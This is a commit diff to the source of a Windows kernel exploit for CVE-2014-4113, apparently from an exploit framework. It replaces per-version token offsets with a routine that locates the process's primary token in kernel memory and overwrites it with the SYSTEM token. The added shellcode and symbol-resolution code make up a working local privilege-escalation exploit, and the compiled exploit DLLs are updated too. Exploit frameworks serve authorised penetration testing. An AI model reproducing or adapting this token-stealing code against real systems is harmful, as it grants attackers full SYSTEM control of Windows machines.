Search the AccessToken

2014-10-30 12:17:03 -05:00 · 2014-10-30 12:17:03 -05:00 · 03a84a1de3
parent 71a6ec8b12
commit 03a84a1de3
3 changed files with 59 additions and 61 deletions
--- a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
+++ b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
--- a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
+++ b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
@ -38,6 +38,10 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
 	OUT  PVOID Process
 );

+typedef NTSTATUS(NTAPI *lPsReferencePrimaryToken)(
+	_Inout_  PVOID Process
+);
+
 typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
 	_In_       DWORD SystemInformationClass,
 	_Inout_    PVOID SystemInformation,
@ -70,9 +74,9 @@ BOOL bHookCallbackFlag = FALSE;

 WNDPROC lpPrevWndFunc;
 DWORD dwMyProcessId = 0;
-DWORD dwOffsetWindows = 0;

 lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
+lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
 lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;

 #ifdef DEBUGGING
@ -131,16 +135,53 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
 #endif
 }

+
+// Search the specified data structure for a member with CurrentValue.
+BOOL FindAndReplaceMember(PDWORD Structure,
+	DWORD CurrentValue,
+	DWORD NewValue,
+	DWORD MaxSize)
+{
+	DWORD i, Mask;
+
+	// Microsoft QWORD aligns object pointers, then uses the lower three
+	// bits for quick reference counting.
+	Mask = ~7;
+
+	// Mask out the reference count.
+	CurrentValue &= Mask;
+
+	// Scan the structure for any occurrence of CurrentValue.
+	for (i = 0; i < MaxSize; i++) {
+		if ((Structure[i] & Mask) == CurrentValue) {
+			// And finally, replace it with NewValue.
+			Structure[i] = NewValue;
+			return TRUE;
+		}
+	}
+
+	// Member not found.
+	return FALSE;
+}
+
 int _stdcall shellcode_ring0(int one, int two, int three, int four)
 {
-	void *my_process_info = NULL;
-	void *system_info = NULL;
+	void *pMyProcessInfo = NULL;
+	void *pSystemInfo = NULL;
+	PACCESS_TOKEN SystemToken;
+	PACCESS_TOKEN TargetToken;

-	pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &my_process_info);
-	pPsLookupProcessByProcessId((HANDLE)4, &system_info);
+	pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
+	pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);

-	*(PDWORD)((PBYTE)my_process_info + dwOffsetWindows) = *(PDWORD)((PBYTE)system_info + dwOffsetWindows);
+	TargetToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pMyProcessInfo);
+	SystemToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pSystemInfo);

+	// Find the token in the target process, and replace with the system token.
+	FindAndReplaceMember((PDWORD)pMyProcessInfo,
+		(DWORD)TargetToken,
+		(DWORD)SystemToken,
+		0x200);
 	return 0;
 }

@ -169,61 +210,6 @@ void win32k_null_page(LPVOID lpPayload)
 		return;
 	}

-#ifdef _M_X64
-	if (versionInfo.dwMajorVersion == 6 && versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
-	{
-		// Ex: Windows 7 SP1
-		dprintf("[*] Windows 6.1 found...");
-		dwOffsetWindows = 0x208;
-	}
-#else
-	if (versionInfo.dwMajorVersion == 6)
-	{
-		if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
-		{
-			// Ex: Windows 7 SP1
-			dprintf("[*] Windows 6.1 found...");
-			dwOffsetWindows = 0xf8;
-		}
-		else if (!versionInfo.dwMinorVersion)
-		{
-			// Ex: Windows 2008 R2
-			dprintf("[*] Windows 6.0 found...");
-			dwOffsetWindows = 0xe0;
-		}
-		else
-		{
-			dprintf("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", versionInfo.dwMinorVersion);
-			return;
-		}
-	}
-	else if (versionInfo.dwMajorVersion == 5)
-	{
-		if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
-		{
-			// Ex: Windows XP SP3
-			dprintf("[*] Windows 5.1 found...");
-			dwOffsetWindows = 0xc8;
-		}
-		else if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 2)
-		{
-			// Ex: Windows 2003 SP2
-			dprintf("[*] Windows 5.2 found...");
-			dwOffsetWindows = 0xd8;
-		}
-		else
-		{
-			dprintf("[!] Unsupported Windows 5  found, only 5.1 and 5.2 supported atm");
-			return;
-		}
-	}
-#endif
-	else
-	{
-		dprintf("[!] Major Version %d found, not supported", versionInfo.dwMajorVersion);
-		return;
-	}
-
 	// Solve symbols
 	dprintf("[*] Solving symbols...");

@ -321,6 +307,18 @@ void win32k_null_page(LPVOID lpPayload)
 	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)hNtKrnl));
 	dprintf("[*] pPsLookupProcessByProcessId in kernel: 0x%p", pPsLookupProcessByProcessId);

+
+	pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(hNtKrnl, "PsReferencePrimaryToken");
+
+	if (pPsReferencePrimaryToken == NULL)
+	{
+		dprintf("[!] Failed to solve PsLookupProcessByProcessId");
+		return;
+	}
+
+	pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)hNtKrnl));
+	dprintf("[*] pPsReferencePrimaryToken in kernel: 0x%p", pPsReferencePrimaryToken);
+
 	dwMyProcessId = GetCurrentProcessId();

 	// Register Class